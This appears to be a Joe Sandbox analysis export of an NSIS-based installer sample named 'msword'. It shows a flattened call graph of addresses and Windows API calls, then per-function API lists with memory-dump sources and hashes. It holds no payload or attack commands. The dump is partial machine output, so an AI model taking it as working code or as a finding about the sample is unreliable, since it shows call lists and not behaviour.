SendMessageW 4122->4127 4123 40141d 80 API calls 4123->4142 4124 4058de DestroyWindow KiUserCallbackDispatcher 4124->4171 4181 403dca 4125->4181 4130 40554c 4126->4130 4131 40552f SendMessageW IsWindowEnabled 4126->4131 4127->4132 4129 40590d ShowWindow 4129->4132 4134 405559 4130->4134 4135 4055a0 SendMessageW 4130->4135 4136 40556c 4130->4136 4145 405551 4130->4145 4131->4130 4131->4132 4133 406805 18 API calls 4133->4142 4134->4135 4134->4145 4135->4125 4139 405574 4136->4139 4140 405589 4136->4140 4138 403d3f 19 API calls 4138->4142 4143 40141d 80 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4141 405587 4141->4125 4142->4123 4142->4124 4142->4132 4142->4133 4142->4138 4162 40581e DestroyWindow 4142->4162 4172 403d3f 4142->4172 4143->4145 4146 405590 4144->4146 4178 403d18 4145->4178 4146->4125 4146->4145 4148 405705 GetDlgItem 4149 405723 ShowWindow KiUserCallbackDispatcher 4148->4149 4150 40571a 4148->4150 4175 403d85 KiUserCallbackDispatcher 4149->4175 4150->4149 4152 40574d EnableWindow 4155 405761 4152->4155 4153 405766 GetSystemMenu EnableMenuItem SendMessageW 4154 405796 SendMessageW 4153->4154 4153->4155 4154->4155 4155->4153 4176 403d98 SendMessageW 4155->4176 4177 406009 lstrcpynW 4155->4177 4158 4057c4 lstrlenW 4159 406805 18 API calls 4158->4159 4160 4057da SetWindowTextW 4159->4160 4161 40139d 80 API calls 4160->4161 4161->4142 4163 405838 CreateDialogParamW 4162->4163 4162->4171 4164 40586b 4163->4164 4163->4171 4165 403d3f 19 API calls 4164->4165 4166 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4165->4166 4167 40139d 80 API calls 4166->4167 4168 4058bc 4167->4168 4168->4132 4169 4058c4 ShowWindow 4168->4169 4170 403daf SendMessageW 4169->4170 4170->4171 4171->4129 4171->4132 4173 406805 18 API calls 4172->4173 4174 403d4a SetDlgItemTextW 4173->4174 4174->4148 4175->4152 4176->4155 4177->4158 4179 403d25 SendMessageW 4178->4179 4180 403d1f 4178->4180 4179->4141 4180->4179 4182 403ddf GetWindowLongW 4181->4182 4192 403e68 
4181->4192 4183 403df0 4182->4183 4182->4192 4184 403e02 4183->4184 4185 403dff GetSysColor 4183->4185 4186 403e12 SetBkMode 4184->4186 4187 403e08 SetTextColor 4184->4187 4185->4184 4188 403e30 4186->4188 4189 403e2a GetSysColor 4186->4189 4187->4186 4190 403e41 4188->4190 4191 403e37 SetBkColor 4188->4191 4189->4188 4190->4192 4193 403e54 DeleteObject 4190->4193 4194 403e5b CreateBrushIndirect 4190->4194 4191->4190 4192->4132 4193->4194 4194->4192 4734 4020f9 GetDC GetDeviceCaps 4735 401446 18 API calls 4734->4735 4736 402116 MulDiv 4735->4736 4737 401446 18 API calls 4736->4737 4738 40212c 4737->4738 4739 406805 18 API calls 4738->4739 4740 402165 CreateFontIndirectW 4739->4740 4741 4030dc 4740->4741 4742 4030e3 4741->4742 4744 405f51 wsprintfW 4741->4744 4744->4742 4745 4024fb 4746 40145c 18 API calls 4745->4746 4747 402502 4746->4747 4748 40145c 18 API calls 4747->4748 4749 40250c 4748->4749 4750 40145c 18 API calls 4749->4750 4751 402515 4750->4751 4752 40145c 18 API calls 4751->4752 4753 40251f 4752->4753 4754 40145c 18 API calls 4753->4754 4755 402529 4754->4755 4756 40253d 4755->4756 4757 40145c 18 API calls 4755->4757 4758 4062a3 11 API calls 4756->4758 4757->4756 4759 40256a CoCreateInstance 4758->4759 4760 40258c 4759->4760 4761 40497c GetDlgItem GetDlgItem 4762 4049d2 7 API calls 4761->4762 4767 404bea 4761->4767 4763 404a76 DeleteObject 4762->4763 4764 404a6a SendMessageW 4762->4764 4765 404a81 4763->4765 4764->4763 4768 404ab8 4765->4768 4770 406805 18 API calls 4765->4770 4766 404ccf 4769 404d74 4766->4769 4774 404bdd 4766->4774 4779 404d1e SendMessageW 4766->4779 4767->4766 4777 40484e 5 API calls 4767->4777 4790 404c5a 4767->4790 4773 403d3f 19 API calls 4768->4773 4771 404d89 4769->4771 4772 404d7d SendMessageW 4769->4772 4776 404a9a SendMessageW SendMessageW 4770->4776 4781 404da2 4771->4781 4782 404d9b ImageList_Destroy 4771->4782 4792 404db2 4771->4792 4772->4771 4778 404acc 4773->4778 4780 403dca 8 API calls 4774->4780 4775 404cc1 
SendMessageW 4775->4766 4776->4765 4777->4790 4783 403d3f 19 API calls 4778->4783 4779->4774 4785 404d33 SendMessageW 4779->4785 4786 404f6b 4780->4786 4787 404dab GlobalFree 4781->4787 4781->4792 4782->4781 4788 404add 4783->4788 4784 404f1c 4784->4774 4793 404f31 ShowWindow GetDlgItem ShowWindow 4784->4793 4789 404d46 4785->4789 4787->4792 4791 404baa GetWindowLongW SetWindowLongW 4788->4791 4800 404ba4 4788->4800 4803 404b39 SendMessageW 4788->4803 4804 404b67 SendMessageW 4788->4804 4805 404b7b SendMessageW 4788->4805 4799 404d57 SendMessageW 4789->4799 4790->4766 4790->4775 4794 404bc4 4791->4794 4792->4784 4795 404de4 4792->4795 4798 40141d 80 API calls 4792->4798 4793->4774 4796 404be2 4794->4796 4797 404bca ShowWindow 4794->4797 4808 404e12 SendMessageW 4795->4808 4811 404e28 4795->4811 4813 403d98 SendMessageW 4796->4813 4812 403d98 SendMessageW 4797->4812 4798->4795 4799->4769 4800->4791 4800->4794 4803->4788 4804->4788 4805->4788 4806 404ef3 InvalidateRect 4806->4784 4807 404f09 4806->4807 4814 4043ad 4807->4814 4808->4811 4810 404ea1 SendMessageW SendMessageW 4810->4811 4811->4806 4811->4810 4812->4774 4813->4767 4815 4043cd 4814->4815 4816 406805 18 API calls 4815->4816 4817 40440d 4816->4817 4818 406805 18 API calls 4817->4818 4819 404418 4818->4819 4820 406805 18 API calls 4819->4820 4821 404428 lstrlenW wsprintfW SetDlgItemTextW 4820->4821 4821->4784 4822 4026fc 4823 401ee4 4822->4823 4825 402708 4822->4825 4823->4822 4824 406805 18 API calls 4823->4824 4824->4823 4274 4019fd 4275 40145c 18 API calls 4274->4275 4276 401a04 4275->4276 4277 405e7f 2 API calls 4276->4277 4278 401a0b 4277->4278 4826 4022fd 4827 40145c 18 API calls 4826->4827 4828 402304 GetFileVersionInfoSizeW 4827->4828 4829 40232b GlobalAlloc 4828->4829 4833 4030e3 4828->4833 4830 40233f GetFileVersionInfoW 4829->4830 4829->4833 4831 402350 VerQueryValueW 4830->4831 4832 402381 GlobalFree 4830->4832 4831->4832 4835 402369 4831->4835 4832->4833 4839 405f51 wsprintfW 4835->4839 4837 
402375 4840 405f51 wsprintfW 4837->4840 4839->4837 4840->4832 4841 402afd 4842 40145c 18 API calls 4841->4842 4843 402b04 4842->4843 4848 405e50 GetFileAttributesW CreateFileW 4843->4848 4845 402b10 4846 4030e3 4845->4846 4849 405f51 wsprintfW 4845->4849 4848->4845 4849->4846 4850 4029ff 4851 401553 19 API calls 4850->4851 4852 402a09 4851->4852 4853 40145c 18 API calls 4852->4853 4854 402a12 4853->4854 4855 402a1f RegQueryValueExW 4854->4855 4857 401a13 4854->4857 4856 402a3f 4855->4856 4860 402a45 4855->4860 4856->4860 4861 405f51 wsprintfW 4856->4861 4859 4029e4 RegCloseKey 4859->4857 4860->4857 4860->4859 4861->4860 4862 401000 4863 401037 BeginPaint GetClientRect 4862->4863 4864 40100c DefWindowProcW 4862->4864 4866 4010fc 4863->4866 4867 401182 4864->4867 4868 401073 CreateBrushIndirect FillRect DeleteObject 4866->4868 4869 401105 4866->4869 4868->4866 4870 401170 EndPaint 4869->4870 4871 40110b CreateFontIndirectW 4869->4871 4870->4867 4871->4870 4872 40111b 6 API calls 4871->4872 4872->4870 4873 401f80 4874 401446 18 API calls 4873->4874 4875 401f88 4874->4875 4876 401446 18 API calls 4875->4876 4877 401f93 4876->4877 4878 401fa3 4877->4878 4879 40145c 18 API calls 4877->4879 4880 401fb3 4878->4880 4881 40145c 18 API calls 4878->4881 4879->4878 4882 402006 4880->4882 4883 401fbc 4880->4883 4881->4880 4885 40145c 18 API calls 4882->4885 4884 401446 18 API calls 4883->4884 4887 401fc4 4884->4887 4886 40200d 4885->4886 4888 40145c 18 API calls 4886->4888 4889 401446 18 API calls 4887->4889 4890 402016 FindWindowExW 4888->4890 4891 401fce 4889->4891 4895 402036 4890->4895 4892 401ff6 SendMessageW 4891->4892 4893 401fd8 SendMessageTimeoutW 4891->4893 4892->4895 4893->4895 4894 4030e3 4895->4894 4897 405f51 wsprintfW 4895->4897 4897->4894 4898 402880 4899 402884 4898->4899 4900 40145c 18 API calls 4899->4900 4901 4028a7 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028b1 4902->4903 4904 4028ba RegCreateKeyExW 4903->4904 4905 4028e8 4904->4905 4912 4029ef 
4904->4912 4906 402934 4905->4906 4907 40145c 18 API calls 4905->4907 4908 402963 4906->4908 4911 401446 18 API calls 4906->4911 4910 4028fc lstrlenW 4907->4910 4909 4029ae RegSetValueExW 4908->4909 4913 40337f 37 API calls 4908->4913 4916 4029c6 RegCloseKey 4909->4916 4917 4029cb 4909->4917 4914 402918 4910->4914 4915 40292a 4910->4915 4918 402947 4911->4918 4919 40297b 4913->4919 4920 4062a3 11 API calls 4914->4920 4921 4062a3 11 API calls 4915->4921 4916->4912 4922 4062a3 11 API calls 4917->4922 4923 4062a3 11 API calls 4918->4923 4929 406224 4919->4929 4925 402922 4920->4925 4921->4906 4922->4916 4923->4908 4925->4909 4928 4062a3 11 API calls 4928->4925 4930 406247 4929->4930 4931 40628a 4930->4931 4932 40625c wsprintfW 4930->4932 4933 402991 4931->4933 4934 406293 lstrcatW 4931->4934 4932->4931 4932->4932 4933->4928 4934->4933 4935 402082 4936 401446 18 API calls 4935->4936 4937 402093 SetWindowLongW 4936->4937 4938 4030e3 4937->4938 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 
4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3709 40141d 3520->3709 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3701 406c68 3529->3701 3706 405c3f CreateProcessW 3529->3706 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3712 406038 3546->3712 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3721 406722 lstrlenW CharPrevW 3549->3721 3728 405e50 GetFileAttributesW CreateFileW 3554->3728 3556 4035c7 3577 4035d7 3556->3577 3729 406009 lstrcpynW 3556->3729 3558 4035ed 3730 406751 lstrlenW 3558->3730 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3737 4032d2 3563->3737 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3771 403368 SetFilePointer 3565->3771 3748 403368 SetFilePointer 3567->3748 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3749 40337f 3571->3749 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3735 403336 ReadFile 3576->3735 3577->3482 3578->3567 3578->3577 3579->3576 
3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3812 405f51 wsprintfW 3585->3812 3813 405ed3 RegOpenKeyExW 3586->3813 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3795 403e95 3592->3795 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3819 403e74 3602->3819 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3818 406009 lstrcpynW 3620->3818 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3804 405047 OleInitialize 3626->3804 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3964 403c83 3640->3964 3641->3640 3647 405cb5 
3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4021 406009 lstrcpynW 3651->4021 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4022 405e50 GetFileAttributesW CreateFileW 3674->4022 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3698 406812 3683->3698 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4025 406009 lstrcpynW 3684->4025 3685->3527 3685->3529 3687 4068d3 GetVersion 3687->3698 3688 406a46 lstrlenW 3688->3698 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3698 3693 406952 GetSystemDirectoryW 3693->3698 3694 406965 GetWindowsDirectoryW 3694->3698 3695 406038 5 API calls 3695->3698 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3698 3698->3684 3698->3687 3698->3688 3698->3689 3698->3692 3698->3693 3698->3694 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 4023 405f51 wsprintfW 3698->4023 4024 406009 lstrcpynW 3698->4024 3699->3698 3700 4069b1 SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4026 406a99 lstrcpyW 
3703->4026 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3549 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3556 3729->3558 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3562 3736 403357 3735->3736 3736->3576 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3565 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3565 3748->3571 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3580 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3572 3773 40634f 
PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3565 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3595 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3632 3809->3806 3811->3807 3812->3592 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3590 3815->3591 3816->3815 3818->3597 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3615 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 3843 401693 

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                    • GetClientRect.USER32(?,?), ref: 00405196
                                                                    • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                    • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                      • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                    • ShowWindow.USER32(00000000), ref: 004052E7
                                                                    • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                    • ShowWindow.USER32(00000008), ref: 00405333
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                    • CreatePopupMenu.USER32 ref: 00405376
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                    • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                    • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                    • EmptyClipboard.USER32 ref: 00405411
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                    • CloseClipboard.USER32 ref: 0040546E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmp
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                    • String ID: @rD$New install of "%s" to "%s"${
                                                                    • API String ID: 2110491804-2409696222
                                                                    • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                    • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                    • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                    • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • #17.COMCTL32 ref: 004038A2
                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                    • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                    • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                    • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                    • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                    • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                    • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                    • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                    • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                    • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                    • ExitProcess.KERNEL32 ref: 00403AF1
                                                                    • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                    • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                    • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                    • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
